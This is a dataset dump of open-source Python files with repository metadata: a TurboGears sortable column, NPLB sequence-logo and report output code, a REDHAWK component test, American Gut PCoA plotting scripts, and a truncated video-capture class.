repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
eriknyk/devcon | devcon/lib/orderColumn.py | 1 | 1133 | from tg import expose, flash, require, url, request, redirect, validate, response
from sqlalchemy import asc, desc
from tw.forms.datagrid import Column
import genshi
class SortableColumn(Column):
def __init__(self, title, name):
super(SortableColumn, self).__init__(name)
self._title_ = title
def set_title(self, title):
self._title_ = title
def get_title(self):
current_ordering = request.GET.get('ordercol')
if current_ordering and current_ordering[1:] == self.name:
#current_ordering = '-' if current_ordering[0] == '+' else '+'
if current_ordering[0] == '+':
current_ordering = '-'
else:
current_ordering = '+'
else:
current_ordering = '+'
current_ordering += self.name
new_params = dict(request.GET)
new_params['ordercol'] = current_ordering
new_url = url(request.path_url, params=new_params)
return genshi.Markup('<a href="%(page_url)s">%(title)s</a>' % dict(page_url=new_url, title=self._title_))
title = property(get_title, set_title)
| lgpl-2.1 | -7,254,929,501,285,495,000 | 34.40625 | 113 | 0.595763 | false |
computationalBiology/NPLB | NPLB/savefiles.py | 1 | 14566 |
##################### NPLB #####################
# No Promoter Left Behind (NPLB) is a tool to
# find the different promoter architectures within a set of promoter
# sequences. More information can be found in the README file.
# Copyright (C) 2015 Sneha Mitra and Leelavati Narlikar
# NPLB is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# NPLB is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
################################################
import weblogoMod.weblogolib as wl
import plotExtras
import numpy
import os
import gc
import sys
import pickle
from config import *
import copy
def createLogo(sequences, filename, pos, features, eps): # Create logo using Weblogo 3.3
if sequences == []: return
seqs = wl.read_seq_data(sequences)
data = wl.LogoData.from_seqs(seqs)
options = wl.LogoOptions()
options.title = ""
options.size = "large"
options.color_scheme = wl.colorscheme.monochrome
options.stacks_per_line = 100
options.text_font = "Arial-BoldMT"
options.annotate = pos
formt = wl.LogoFormat(data, options)
fout = open(filename + ".png", "w")
wl.png_formatter(data, formt, fout)
fout.close()
if eps == 1:
fout = open(filename + ".eps", "w")
wl.eps_formatter(data, formt, fout)
fout.close()
def sampleOne(l, n, tu, pos, features): # Sample values based on model
arr = ['A', 'C', 'G']
arr = arr + ['T'] if tu == 0 else arr + ['U']
l1 = map(list, zip(*map(lambda x: numpy.array(x).cumsum().searchsorted(numpy.random.sample(n)).tolist(), l)))
l1 = map(lambda x: "".join(map(lambda y: arr[y], l1[x])), range(n))
return l1
def makeImages(d, dirname, tu, tss, prefix, eps): # Create logo for each architecture of given model
lst = [map(lambda x: " ", range(1, d['features'] + 1)) for i in range(d['arch'])]
numpy.random.seed(5)
l = numpy.zeros(shape=(d['arch'], d['features'], d['featureValues']))
for i in range(d['arch']):
for j in range(d['features']):
for k in range(d['featureValues']):
l[i][j][k] = float(d['fvNoise'][j][k] + d['alpha'])/(d['fnoise'][j] + d['featureValues']*d['alpha'])
for j in d['pos'][i]:
for k in range(d['featureValues']):
l[i][j][k] = float(d['count'][i][j][k] + d['alpha'])/(d['t'][i] + d['featureValues']*d['alpha'])
lst[i][j] = "*"
lst[i][tss] = "+1"
if tss in d['pos'][i]: lst[i][tss] = "+1*"
diffN = 25
c = -diffN
c1 = tss - diffN
while c1 >= 0:
lst[i][c1] = str(c) + lst[i][c1]
c = c - diffN
c1 = c1 - diffN
c = diffN
c1 = tss + diffN - 1
while c1 < d['features']:
lst[i][c1] = str(c) + lst[i][c1]
c = c + diffN
c1 = c1 + diffN
l = map(lambda x: sampleOne(l[x], d['t'][x], tu, d['pos'][x], d['features']), range(d['arch']))
for i in range(d['arch']):
createLogo(l[i], dirname + "/" + prefix + str(i), lst[i], d['features'], eps)
def makehtml(dirname, d, l): # Create HTML file containing logos for best model learned by NPLB
f = open(dirname + modelOutHTML, "w")
f.write("<!DOCTYPE html>\n<html>\n<body>\n<h1>MODEL</h1>\n")
f.write("<h3>Lambda: " + str(d['lambda']) + "</h3>\n")
f.write("<h3>Dataset structure: " + str(d['n']) + " sequences with " + str(d['features']) + " features</h3>\n")
f.write("<h3>Number of architectures in the best model: " + str(d['arch']) + "</h3>\n")
f.write("<h3>Likelihood of best model: " + str(l) + "</h3>\n")
for i in range(d['arch']):
f.write("<h4>Architecture " + str(i+1) + ": " + str(d['t'][i]) + " sequences with " + str(d['posCount'][i]) + " important features</h4>\n")
if d['t'][i] == 0:
f.write("<h5>No Sequences</h5>\n")
else:
f.write("<h5>Sequence logo for the important positions in architecture " + str(i+1) + "</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + str(i) + ".png\" style=\"border:thin solid black\">\n")
f.write("<p><i>NOTE: All important positions in the logos are followed by an asterisk symbol and are coloured blue</i></p>")
f.write("</body>\n</html>\n")
f.close()
def makehtmlOrig(dirname, d, l, dO): # Create HTML file containing logos for best model learned by NPLB along with the logo of raw data
f = open(dirname + modelOutHTML, "w")
f.write("<!DOCTYPE html>\n<html>\n<body>\n<h1>MODEL</h1>\n")
f.write("<h3>Lambda: " + str(d['lambda']) + "</h3>\n")
f.write("<h3>Dataset structure: " + str(d['n']) + " sequences with " + str(d['features']) + " features</h3>\n")
f.write("<h3>Number of architectures in the best model: " + str(d['arch']) + "</h3>\n")
f.write("<h3>Likelihood of best model: " + str(l) + "</h3>\n")
for i in range(d['arch']):
f.write("<h4>Architecture " + str(i+1) + ": " + str(d['t'][i]) + " sequences with " + str(d['posCount'][i]) + " important features</h4>\n")
if d['t'][i] == 0:
f.write("<h5>No Sequences</h5>\n")
else:
f.write("<h5>Sequence logo for the important positions in architecture " + str(i+1) + "</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + str(i) + ".png\" style=\"border:thin solid black\">\n")
f.write("<h5>Logo for the raw data</h5>\n")
f.write("<img src=\"" + htmlFiles + "/" + rawDataImgPref + "0.png\" style=\"border:thin solid black\">\n")
f.write("<p><i>NOTE: All important positions in the logos are followed by an asterisk symbol and are coloured blue</i></p>")
f.write("</body>\n</html>\n")
f.close()
def maketxt(dirname, d): # Create text file containing details about the best model
f = open(dirname + modelOutTxt, "w")
f.write("MODEL\n\n")
f.write("Lambda: " + str(d['m']['lambda']) + "\n\n")
f.write("Dataset structure: " + str(d['m']['n']) + " sequences with " + str(d['m']['features']) + " features\n")
f.write("Number of architectures in the best model: " + str(d['m']['arch']) + "\n\n")
for i in range(d['m']['arch']):
f.write("Architecture " + str(i+1) + ": " + str(d['m']['t'][i]) + " sequences with " + str(d['m']['posCount'][i]) + " important features\n")
for j in range(d['m']['posCount'][i]):
f.write(str(d['m']['pos'][i][j]+1) + " (");
f.write(str(float(d['m']['count'][i][d['m']['pos'][i][j]][0] + d['m']['alpha'])/(d['m']['t'][i] + d['m']['featureValues']*d['m']['alpha'])) + " {" + str(d['m']['count'][i][d['m']['pos'][i][j]][0]) + "/" + str(d['m']['t'][i]) + "}")
for k in range(1, d['m']['featureValues']):
f.write(", " + str(float(d['m']['count'][i][d['m']['pos'][i][j]][k] + d['m']['alpha'])/(d['m']['t'][i] + d['m']['featureValues']*d['m']['alpha'])) + " {" + str(d['m']['count'][i][d['m']['pos'][i][j]][k]) + "/" + str(d['m']['t'][i]) + "}")
f.write(")\n")
f.write("\n")
f.close()
f = open(dirname + tempLabelsModelFile, "w")
for i in d['lp']: f.write(str(i) + "\n")
f.close()
os.system("paste" + " " + dirname + tempLabelsModelFile + " " + dirname + tempLabelsFile + " " + ">" + " " + dirname + clusterDetailsFile)
os.system("rm" + " " + dirname + tempLabelsModelFile + " " + dirname + tempLabelsFile)
def makeImage(dirname, model, rfile, tss, imgfile, imgfileeps, inpfile): # Create image matrix of input model
os.system("cut" + " " + "-f1" + " " + dirname + inpfile + " " + ">" + " " + dirname + hiddenLabels)
os.system("rev" + " " + dirname + inpfile + " " + "|" + " " + "cut" + " " + "-f1" + " | rev " + ">" + " " + dirname + hiddenOldData)
indices = [[] for i in range(model['arch'])]
j = 0
with open(dirname + hiddenLabels) as infile:
for line in infile:
tmp = int(line)
indices[model['arch'] - tmp] = indices[model['arch'] - tmp] + [j]
j = j + 1
f = open(dirname + hiddenData, "w")
for i in indices:
j = 0
k = 0
with open(dirname + hiddenOldData) as infile:
for line in infile:
try:
if k == i[j]:
f.write(line)
j = j + 1
k = k + 1
except: pass
f.close()
if sys.platform == "darwin":
os.system("sed" + " " + "-i" + " '' " + "'s/A/0\t/g;s/a/0\t/g;s/C/1\t/g;s/c/1\t/g;s/G/2\t/g;s/g/2\t/g;s/T/3\t/g;s/t/3\t/g;'" + " " + dirname + hiddenData) # Modify input Fasta file to replace A, C, G, and T with 0, 1, 2 and 3 respectively on OS X.
else:
os.system("sed" + " " + "-i" + " " + "'s/A/0\t/g;s/a/0\t/g;s/C/1\t/g;s/c/1\t/g;s/G/2\t/g;s/g/2\t/g;s/T/3\t/g;s/t/3\t/g;'" + " " + dirname + hiddenData) # Modify input Fasta file to replace A, C, G, and T with 0, 1, 2 and 3 respectively on Linux.
f = open(dirname + hiddenDrawLines, "w") # Save lines to be drawn on image matrix
# Save labels for both axes of image matrix
f1 = open(dirname + hiddenDrawLabels1, "w")
c = 0
for i in (model['t'][::-1])[:-1]:
c = c + i
f.write("-0.5\t" + str(c) + "\n" + str(model['features']-0.5) + "\t" + str(c) + "\n\n")
f1.write(str(c) + "\n")
f.close()
f1.close()
f = open(dirname + hiddenDrawLabels2, "w")
c = 0
for i in reversed(range(model['arch'])):
f.write("A" + str(i + 1) + "\t" + str((c + c + model['t'][i])/2) + "\n\n")
c = c + model['t'][i]
f.close()
lst = []
gap = max(int(round(imgMatrixNumGap*model['features'])), 1)
c = -gap
c1 = tss - gap
while c1 >= 0:
lst = [(str(c1), str(c))] + lst
c = c - gap
c1 = c1 - gap
lst = lst + [(str(tss), "+1")]
c = gap
c1 = tss + gap - 1
while c1 < model['features']:
lst = lst + [(str(c1), "+" + str(c))]
c = c + gap
c1 = c1 + gap
f = open(dirname + hiddenDrawXTics, "w")
for (i1, i2) in lst:
f.write(i1 + "\t" + i2 + "\n")
f.close()
os.system("gnuplot" + " " + "-e" + " " + "'filename=\"" + dirname + hiddenData + "\"; var=\"" + dirname + imgfile + "\"; var1=\"" + dirname + hiddenDrawLines + "\"; var2=\"" + dirname + hiddenDrawLabels1 + "\"; var3=\"" + dirname + hiddenDrawLabels2 + "\"; var4=\"" + dirname + hiddenDrawXTics + "\"'" + " " + rfile[0] + " 2> /dev/null")
if imgfileeps != "": os.system("gnuplot" + " " + "-e" + " " + "'filename=\"" + dirname + hiddenData + "\"; var=\"" + dirname + imgfileeps + "\"; var1=\"" + dirname + hiddenDrawLines + "\"; var2=\"" + dirname + hiddenDrawLabels1 + "\"; var3=\"" + dirname + hiddenDrawLabels2 + "\"; var4=\"" + dirname + hiddenDrawXTics + "\"'" + " " + rfile[1] + " 2> /dev/null")
os.system("rm" + " " + "-f" + " " + dirname + "/.??*")
def savecvls(dirname, cvals): # Save cross validation likelihood of the models learned
if cvals == []: return
maxArch = len(cvals)
f = open(dirname + cvLikelihoods, "w")
f.write("Cross validation likelihood of the best models\n\n")
for i in range(maxArch):
f.write(str(cvals[i][0]) + " architectures: ")
if cvals[i][1] == 0: f.write("Not calculated\n")
else: f.write(str(cvals[i][1]) + "\n")
f.close()
def saveDetails(d, dirname, rfile, cvals, tss, flag, pEx, pCol, sBy, eps):
dirname = dirname + "/"
tmp_d_m_pos = d['m']['pos'][0]
if ((tmp_d_m_pos[0] == 0 or tmp_d_m_pos[0] == 1) and (tmp_d_m_pos[1] == 0 or tmp_d_m_pos[1] == 1) and (tmp_d_m_pos[2] == 0 or tmp_d_m_pos[2] == 1)):
for i in range(d['m']['arch']):
d['m']['pos'][i] = filter(lambda x: d['m']['pos'][i][x] == 1, range(d['m']['features']))
if flag == 0: pickle.dump(d['m'], open(dirname + bestModelFile, "wb"))
os.system("rm" + " " + "-rf" + " " + dirname + htmlFiles)
try:
os.mkdir(dirname + htmlFiles)
except OSError:
print "ERROR: Cannot create directory", dirname + htmlFiles
exit(2)
if pEx != '':
if pEx[0] != '' and pCol != 0 and sBy != 0 and flag == 0:
cv = plotExtras.checkValid(pEx[0], sBy, d['m']['n'])
if cv == -1 or cv == 2:
print "Could not sort by values in column", sBy
print "Please check -plotExtra file and/or -sortBy column number"
else:
d = plotExtras.rearrange(d, pEx, sBy)
savecvls(dirname, cvals)
makeImages(d['m'], dirname + htmlFiles, 0, tss, "", eps)
if flag != 0: makehtml(dirname, d['m'], d['l'])
if flag == 0:
# Save information about the raw data
dOrig = {}
dOrig['features'] = d['m']['features']
dOrig['arch'] = 1
dOrig['featureValues'] = d['m']['featureValues']
dOrig['fvNoise'] = map(lambda z: map(lambda y: sum(map(lambda x: d['m']['count'][x][z][y], range(d['m']['arch']))), range(d['m']['featureValues'])), range(d['m']['features']))
dOrig['pos'] = [[]]
dOrig['alpha'] = d['m']['alpha']
dOrig['fnoise'] = [d['m']['n'] for i in range(d['m']['features'])]
dOrig['t'] = [d['m']['n']]
makeImages(dOrig, dirname + htmlFiles, 0, tss, rawDataImgPref, eps)
makehtmlOrig(dirname, d['m'], d['l'], dOrig)
if rfile != 0:
os.system("sed -e 's/^/1\t/' " + dirname + tempLabelsFile + " > " + dirname + rawClusterDetailsFile)
if eps == 0: makeImage(dirname, dOrig, rfile, tss, rawDataImage, "", rawClusterDetailsFile)
else: makeImage(dirname, dOrig, rfile, tss, rawDataImage, rawDataImageEPS, rawClusterDetailsFile)
maketxt(dirname, d)
if rfile != 0 and flag == 0:
if eps == 0: makeImage(dirname, d['m'], rfile, tss, imageMatrix, "", clusterDetailsFile)
else: makeImage(dirname, d['m'], rfile, tss, imageMatrix, imageMatrixEPS, clusterDetailsFile)
if pEx != '':
if pEx[0] != '' and pCol != 0 and flag == 0: plotExtras.plotExt(d, pEx, pCol, dirname)
collected = gc.collect()
| gpl-3.0 | -7,730,404,251,325,200,000 | 48.883562 | 365 | 0.532885 | false |
RedhawkSDR/integration-gnuhawk | components/deinterleave_bb_4o/tests/test_deinterleave_bb_4o.py | 1 | 4079 | #!/usr/bin/env python
#
# This file is protected by Copyright. Please refer to the COPYRIGHT file
# distributed with this source distribution.
#
# This file is part of GNUHAWK.
#
# GNUHAWK is free software: you can redistribute it and/or modify is under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# GNUHAWK is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see http://www.gnu.org/licenses/.
#
import unittest
import ossie.utils.testing
import os
from omniORB import any
class ComponentTests(ossie.utils.testing.ScaComponentTestCase):
"""Test for all component implementations in deinterleave_bb_4o"""
def testScaBasicBehavior(self):
#######################################################################
# Launch the component with the default execparams
execparams = self.getPropertySet(kinds=("execparam",), modes=("readwrite", "writeonly"), includeNil=False)
execparams = dict([(x.id, any.from_any(x.value)) for x in execparams])
self.launch(execparams)
#######################################################################
# Verify the basic state of the component
self.assertNotEqual(self.comp, None)
self.assertEqual(self.comp.ref._non_existent(), False)
self.assertEqual(self.comp.ref._is_a("IDL:CF/Resource:1.0"), True)
#######################################################################
# Validate that query returns all expected parameters
# Query of '[]' should return the following set of properties
expectedProps = []
expectedProps.extend(self.getPropertySet(kinds=("configure", "execparam"), modes=("readwrite", "readonly"), includeNil=True))
expectedProps.extend(self.getPropertySet(kinds=("allocate",), action="external", includeNil=True))
props = self.comp.query([])
props = dict((x.id, any.from_any(x.value)) for x in props)
# Query may return more than expected, but not less
for expectedProp in expectedProps:
self.assertEquals(props.has_key(expectedProp.id), True)
#######################################################################
# Verify that all expected ports are available
for port in self.scd.get_componentfeatures().get_ports().get_uses():
port_obj = self.comp.getPort(str(port.get_usesname()))
self.assertNotEqual(port_obj, None)
self.assertEqual(port_obj._non_existent(), False)
self.assertEqual(port_obj._is_a("IDL:CF/Port:1.0"), True)
for port in self.scd.get_componentfeatures().get_ports().get_provides():
port_obj = self.comp.getPort(str(port.get_providesname()))
self.assertNotEqual(port_obj, None)
self.assertEqual(port_obj._non_existent(), False)
self.assertEqual(port_obj._is_a(port.get_repid()), True)
#######################################################################
# Make sure start and stop can be called without throwing exceptions
self.comp.start()
self.comp.stop()
#######################################################################
# Simulate regular component shutdown
self.comp.releaseObject()
# TODO Add additional tests here
#
# See:
# ossie.utils.bulkio.bulkio_helpers,
# ossie.utils.bluefile.bluefile_helpers
# for modules that will assist with testing components with BULKIO ports
if __name__ == "__main__":
ossie.utils.testing.main("../deinterleave_bb_4o.spd.xml") # By default tests all implementations
| gpl-3.0 | 8,618,088,849,222,091,000 | 46.988235 | 133 | 0.593038 | false |
mortonjt/American-Gut | scripts/mod2_pcoa.py | 1 | 14487 | #!/usr/bin/env python
import os
import click
from matplotlib import use
use('Agg') # noqa
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
from skbio import read, DistanceMatrix
from skbio.stats import isubsample
from skbio.stats.ordination import OrdinationResults
from collections import defaultdict
from collections import OrderedDict
ALPHA = 1.0
LINE_WIDTH = 0.3
LINE_WIDTH_WHITE = 2.0
LINE_WIDTH_BLACK = 1.0
@click.group()
def mod2_pcoa():
pass
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
def body_site(coords, mapping_file, output, prefix, samples):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
mf = mf.loc[o.site_ids]
if samples is None:
samples = mf.index
else:
samples = set(samples.split(',')).intersection(set(o.site_ids))
samples = mf.loc[samples].index
color_hmp_fecal = sns.color_palette('Paired', 12)[10] # light brown
color_agp_fecal = sns.color_palette('Paired', 12)[11] # dark brown
color_hmp_oral = sns.color_palette('Paired', 12)[0] # light blue
color_agp_oral = sns.color_palette('Paired', 12)[1] # dark blue
color_hmp_skin = sns.color_palette('Paired', 12)[2] # light green
color_agp_skin = sns.color_palette('Paired', 12)[3] # dark green
grp_colors = {'AGP-FECAL': color_agp_fecal,
'AGP-ORAL': color_agp_oral,
'AGP-SKIN': color_agp_skin,
'HMP-FECAL': color_hmp_fecal,
'GG-FECAL': color_hmp_fecal,
'PGP-FECAL': color_hmp_fecal,
'HMP-ORAL': color_hmp_oral,
'PGP-ORAL': color_hmp_oral,
'HMP-SKIN': color_hmp_skin,
'PGP-SKIN': color_hmp_skin}
for sample in samples:
# plot categories as 50 slices with random zorder
for grp, color in grp_colors.iteritems():
sub_coords = c_df[mf.TITLE_BODY_SITE == grp].values
for i in np.array_split(sub_coords, 50):
plt.scatter(i[:, 0], i[:, 1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA, zorder=np.random.rand())
# plot participant's dot
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample]['TITLE_BODY_SITE']],
s=270, edgecolor='w', zorder=1, lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample]['TITLE_BODY_SITE']],
s=250, edgecolor=np.asarray(
grp_colors[mf.loc[sample]['TITLE_BODY_SITE']])*0.6,
zorder=2, lw=LINE_WIDTH_BLACK)
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
@mod2_pcoa.command()
@click.option('--distmat', required=True, type=click.Path(resolve_path=True,
readable=True,
exists=True),
help='Input distance matrix to subsample nearest sample')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--max', required=True, type=int,
help='Max number of samples per category value')
@click.option('--category', required=True, type=str,
help='The category to subsample in (likely COUNTRY)')
@click.option('--output', required=True, type=click.Path(exists=False,
writable=True, resolve_path=True), help='Output file')
def subsample_dm(distmat, mapping_file, max, category, output):
"""Subsample the distmat to max samples per category value"""
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
id_to_cat = dict(mf[category])
def bin_f(x):
return id_to_cat[x]
dm = read(distmat, into=DistanceMatrix)
dm = dm.filter([id for _, id in isubsample(dm.ids, max, bin_f=bin_f)])
dm.to_file(output)
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(resolve_path=True,
readable=True, exists=True), help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
@click.option('--distmat', required=True, type=click.Path(resolve_path=True,
readable=True,
exists=True),
help=('Input distance matrix to find nearest sample (if not '
'present in the coordinates'))
def country(coords, mapping_file, output, prefix, samples, distmat):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
o_id_lookup = set(o.site_ids)
dm = read(distmat, into=DistanceMatrix)
dm_id_lookup = {i: idx for idx, i in enumerate(dm.ids)}
coord_samples_in_dm = {idx for idx, i in enumerate(dm.ids)
if i in o_id_lookup}
# we'll be computing min values, so we need to avoid catching the diagonal
np.fill_diagonal(dm._data, np.inf)
x, y = o.site[:, 0], o.site[:, 1]
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
# mf = mf.loc[o.site_ids]
if samples is None:
samples = dm.ids[:]
else:
samples = set(samples.split(',')).intersection(set(dm.ids))
samples = mf.loc[samples].index
color_Venezuela = sns.color_palette('Paired', 12)[10]
color_Malawi = sns.color_palette('Paired', 12)[1]
color_Western = sns.color_palette('Paired', 12)[4]
color_Highlight = sns.color_palette('Paired', 12)[5]
color_no_data = (0.5, 0.5, 0.5)
grp_colors = OrderedDict()
grp_colors['no_data'] = color_no_data
grp_colors['Australia'] = color_Western
grp_colors['Belgium'] = color_Western
grp_colors['Canada'] = color_Western
grp_colors['China'] = color_Western
grp_colors['Finland'] = color_Western
grp_colors['France'] = color_Western
grp_colors['Germany'] = color_Western
grp_colors['Great Britain'] = color_Western
grp_colors['Ireland'] = color_Western
grp_colors['Japan'] = color_Western
grp_colors['Netherlands'] = color_Western
grp_colors['New Zealand'] = color_Western
grp_colors['Norway'] = color_Western
grp_colors['Scotland'] = color_Western
grp_colors['Spain'] = color_Western
grp_colors['Switzerland'] = color_Western
grp_colors['Thailand'] = color_Western
grp_colors['United Arab Emirates'] = color_Western
grp_colors['United Kingdom'] = color_Western
grp_colors['United States of America'] = color_Western
grp_colors['Malawi'] = color_Malawi
grp_colors['Venezuela'] = color_Venezuela
for sample_to_plot in samples:
if sample_to_plot in o_id_lookup:
sample = sample_to_plot
else:
# find the closest sample in the distance matrix that is in the
# coordinates data
sample = None
for i in dm[dm_id_lookup[sample_to_plot]].argsort():
if i in coord_samples_in_dm:
sample = dm.ids[i]
break
# this should not ever happen
if sample is None:
raise ValueError("Unable to find a similar sample?")
# countour plot superimposed
sns.kdeplot(x, y, cmap='bone')
sns.set_context(rc={"lines.linewidth": 0.75})
# change particapant's country's color to color_Highlight unless
# country is Venezuela or Malawi
if (mf.loc[sample_to_plot]['COUNTRY'] != 'Malawi') & (
mf.loc[sample_to_plot]['COUNTRY'] != 'Venezuela'):
grp_colors[mf.loc[sample_to_plot]['COUNTRY']] = color_Highlight
# plot each country except participant's according to colors above
for grp, color in grp_colors.iteritems():
if grp == mf.loc[sample_to_plot]['COUNTRY']:
continue
sub_coords = c_df[mf.COUNTRY == grp]
plt.scatter(sub_coords[0], sub_coords[1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA)
# now plot participant's country
grp = mf.loc[sample_to_plot]['COUNTRY']
color = grp_colors[grp]
sub_coords = c_df[mf.COUNTRY == grp]
plt.scatter(sub_coords[0], sub_coords[1], color=color,
edgecolor=np.asarray(color)*0.6, lw=LINE_WIDTH,
alpha=ALPHA)
# plot participant's dot
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample_to_plot]['COUNTRY']],
s=270, edgecolor='w', zorder=1, lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=grp_colors[mf.loc[sample_to_plot]['COUNTRY']],
s=250, edgecolor=np.asarray(grp_colors[
mf.loc[sample_to_plot]['COUNTRY']])*0.6,
zorder=2, lw=LINE_WIDTH_BLACK)
# reset particapant's country's color to color_Western unless country
# is Venezuela or Malawi
if (mf.loc[sample_to_plot]['COUNTRY'] != 'Malawi') & (
mf.loc[sample_to_plot]['COUNTRY'] != 'Venezuela'):
grp_colors[mf.loc[sample_to_plot]['COUNTRY']] = color_Western
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
@mod2_pcoa.command()
@click.option('--coords', required=True, type=click.Path(resolve_path=True,
readable=True, exists=True), help='Coordinates file')
@click.option('--mapping_file', required=True, type=click.Path(
resolve_path=True, readable=True, exists=True),
help='Mapping file')
@click.option('--color', required=True, type=str,
help='Metadata category to set color by')
@click.option('--output', required=True, type=click.Path(exists=True,
writable=True, resolve_path=True), help='Output directory')
@click.option('--prefix', required=True, type=str, help='Output file prefix')
@click.option('--samples', required=False, type=str,
help='Comma separated list of samples to print')
def gradient(coords, mapping_file, color, output, prefix, samples):
"""Generates as many figures as samples in the coordinates file"""
o = read(coords, into=OrdinationResults)
# coordinates
c_df = pd.DataFrame(o.site, o.site_ids)
# mapping file
mf = pd.read_csv(mapping_file, '\t', converters=defaultdict(str),
index_col='#SampleID')
mf = mf.loc[o.site_ids]
mf[color] = mf[color].convert_objects(convert_numeric=True)
if samples is None:
samples = mf.index
else:
samples = set(samples.split(',')).intersection(set(o.site_ids))
samples = mf.loc[samples].index
numeric = mf[~pd.isnull(mf[color])]
non_numeric = mf[pd.isnull(mf[color])]
color_array = plt.cm.RdBu(numeric[color]/max(numeric[color]))
for sample in samples:
# plot numeric metadata as colored gradient
ids = numeric.index
x, y = c_df.loc[ids][0], c_df.loc[ids][1]
plt.scatter(x, y, c=numeric[color], cmap=plt.get_cmap('RdBu'),
alpha=ALPHA, lw=LINE_WIDTH, edgecolor=color_array*0.6)
# plt.colorbar()
# plot non-numeric metadata as gray
ids = non_numeric.index
x, y = c_df.loc[ids][0], c_df.loc[ids][1]
plt.scatter(x, y, c='0.5', alpha=ALPHA, lw=LINE_WIDTH, edgecolor='0.3')
# plot individual's dot
try:
color_index = numeric.index.tolist().index(sample)
except ValueError:
color_index = None
if color_index is None:
_color = (0.5, 0.5, 0.5)
else:
_color = color_array[color_index]
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=_color, s=270, edgecolor='w', lw=LINE_WIDTH_WHITE)
plt.scatter(c_df.loc[sample][0], c_df.loc[sample][1],
color=_color, s=250, edgecolor=np.asarray(_color)*0.6,
lw=LINE_WIDTH_BLACK)
plt.axis('off')
my_dpi = 72
figsize = (1000 / my_dpi, 1000 / my_dpi)
out_file = os.path.join(output, '.'.join([prefix, sample, 'pdf']))
plt.savefig(out_file, figsize=figsize, dpi=my_dpi)
plt.close()
if __name__ == '__main__':
mod2_pcoa()
| bsd-3-clause | -6,790,581,772,316,809,000 | 40.03966 | 79 | 0.58908 | false |
Skydes/Monitoring | src/capture.py | 1 | 4332 | #!/usr/bin/env python
'''
Copyright (c) 2016, Paul-Edouard Sarlin
All rights reserved.
Project: Autonomous Monitoring System
File: capture.py
Date: 2016-08-08
Author: Paul-Edouard Sarlin
Website: https://github.com/skydes/monitoring
'''
from multiprocessing import Process, Event, Lock, Queue
from Queue import Full
from time import sleep
import v4l2capture
import select
import cv2
import os
import logging
import numpy as np
FAIL = False
class Capture(Process):
def __init__(self, out_queue, conf, conf_lock):
Process.__init__(self)
self._out_queue = out_queue
self._stop = Event()
self._stop.set()
self._new_conf = Event()
self._new_conf.clear()
self._conf_lock = conf_lock
self._conf = conf
self._stream = None
self._device_name = None
def setDevice(self, device):
self._device_name = device
def openStream(self):
logging.debug("Opening stream.")
try:
self._stream = v4l2capture.Video_device("/dev/"+self._device_name)
except IOError as err_pref:
logging.debug("Could not open default device.")
devices = [x for x in os.listdir("/dev/") if x.startswith("video")]
devices.sort()
